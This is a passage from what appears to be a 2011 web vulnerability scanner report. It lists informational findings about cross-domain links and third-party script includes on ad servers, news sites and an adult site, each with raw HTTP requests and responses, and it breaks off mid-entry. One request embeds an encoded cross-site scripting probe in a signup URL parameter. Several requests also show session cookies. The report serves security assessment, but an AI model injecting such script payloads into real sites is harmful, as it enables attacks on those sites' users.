<a href="http://www.xhamstercams.com/webcam/mature-women/?AFNO=1-0-624213-344279&UHNSMTY=458" class="thumb"><img src="http://cdn.nsimg.net/cache/chat/landing-page/1/avchat/20110107/mature.jpg" alt="Mature LIVE SEX" width="225" height="170" ></a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://m2.nsimg.net/cache/js/bundle/naiad/20110806/naiad.js"></script>
...[SNIP]...

13.58. http://www.zedo.com/shared/commonHeader.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zedo.com
Path:   /shared/commonHeader.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shared/commonHeader.htm?pg= HTTP/1.1
Host: www.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 09:01:30 GMT
ETag: "163612f-79d3-4a7c76dd74e80"
Vary: Accept-Encoding
Server: ZEDO 3G
Accept-Ranges: bytes
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 31187
Cache-Control: max-age=1869098
Expires: Tue, 06 Sep 2011 10:07:14 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

<link rel="stylesheet" href="http://www.zedo.com/shared/brochure.css" type="text/css">
<link rel="stylesheet" href="http://www.zedo.com/shared/tabs.css" type="text/css">
<SCRIPT LANGUAGE="JavaScript"
...[SNIP]...
<br>
<a href="http://visitor.constantcontact.com/d.jsp?m=1103508747114&p=oi" target="_blank"><img src="../images/brochure/newsletterSubscribeIcon.gif" width="21" height="16" border="0" onmouseover="Tip('Join Our Mailing List');"></a>
<a href="http://www.linkedin.com/company/zedo" target="_blank"><img src="../images/brochure/linkedin.gif" width="16" height="16" border="0" onmouseover="Tip('Follow Us on Linkedin');" ></a>
<a href="http://www.facebook.com/ZEDOadsolutions" target="_blank"><img src="../images/brochure/facebook.gif" width="16" height="16" border="0" onmouseover="Tip('Follow Us on Facebook');" ></a>
<a href="http://twitter.com/zedoinc" target="_blank"><img src="../images/brochure/twitter.gif" width="16" height="16" border="0" onmouseover="Tip('Follow Us on Twitter');">
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

13.59. http://wzus1.ask.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wzus1.ask.com
Path:   /r

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /r?t=a&d=us&s=a&c=bntps&app=a14&ti=1&ai=5015&l=dir&o=0&sv=0a5c4073&ip=32177b6a&cu.wz=0&u=http%3A%2F%2Fhire.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqXY9VfwJ%26su%3DfsY9Vfwe%26cs%3D93q9Vfwh HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:28:03 GMT
Location: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&amp;su=fsY9Vfwe&amp;cs=93q9Vfwh">here</a>
...[SNIP]...

13.60. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Set-Cookie: ismobile=0; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Set-Cookie: stats=74; expires=Mon, 22-Aug-2011 19:04:00 GMT; path=/; domain=.xhamster.com
Srv: m4
Vary: Accept-Encoding
Content-Length: 29184

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<LI><A href="http://ads.sexier.com/services/AdsRedirect.ashx?case=Xhamstertab" target="_blank" title='Live Sex'>&nbsp;Live Sex&nbsp;</A>
...[SNIP]...
<LI><A href="http://xhamsterpremiumpass.com/?from=t" title='Porn DVD Downloads'>&nbsp;Premium&nbsp;</A>
...[SNIP]...
<li><a rel="nofollow" href= "http://www.parentalcontrolbar.org/" target="_blank">Parental Control</a>
...[SNIP]...
<li><a rel="nofollow" href= "http://twitter.com/#!/xhamstercom" target="_blank">xHamster's Twitter</a>
...[SNIP]...

14. Cross-domain script include  previous  next
There are 49 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


14.1. http://a2.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.mediagra.com
Path:   /b.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b.php?s=13 HTTP/1.1
Host: a2.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrSyMDG0BvOT80pAfCPrWgA%3D; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 740
Date: Mon, 15 Aug 2011 19:05:49 GMT
X-Varnish: 1909287838
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/jquery-1.4.2.min.js'></script><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/mediagra.js?20'></script>
...[SNIP]...

14.2. http://a5.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a5.mediagra.com
Path:   /b.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b.php?s=13 HTTP/1.1
Host: a5.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.2
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrQyMjS2BvOT80rAfOtaAA%3D%3D; path=/
Content-Length: 838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/jquery-1.4.2.min.js'></script><script language='javascript' type='text/javascript' src='http://static.xhamster.com/js/mediagra.js?20'></script>
...[SNIP]...

14.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.7

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.7;sz=728x90;ord=76407451872406880;click=http://pixel.mathtag.com/click/img?mt_aid=76407451872406880&mt_id=112511&mt_adid=100488&mt_uuid=4e394114-5150-5bce-73fa-628197421391&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 15 Aug 2011 18:41:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 7925
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri Dec 17 15:50:07 EST 2010 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

14.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/amzn.us.house.redirect/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2154
Date: Mon, 15 Aug 2011 18:26:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 15103 Template Name = !IMDb - Simple 3rd Pa
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
...[SNIP]...

14.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:14 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:14 GMT
Pragma: no-cache
Content-Length: 2766
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...

14.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=aolturnercnnmoney-2010%3D%2526pid%253Dmny%25253Ac%25253Amoney%25253A%25252F2011%25252F08%25252F15%25252Ftechnology%25252Fgoogle_motorola%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ftech.fortune.cnn.com%25252F2011%25252F08%25252F15%25252Fis-google-buying-motorola-for-its-17000-patents%25252F%25253Fiid%25253DEL%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:09 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:09 GMT
Pragma: no-cache
Content-Length: 2715
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...

14.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:33 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:33 GMT
Pragma: no-cache
Content-Length: 2765
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_cnn_adsonar.js"></script>
...[SNIP]...

14.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

Issue detail

The response dynamically includes the following script from another domain:

Request

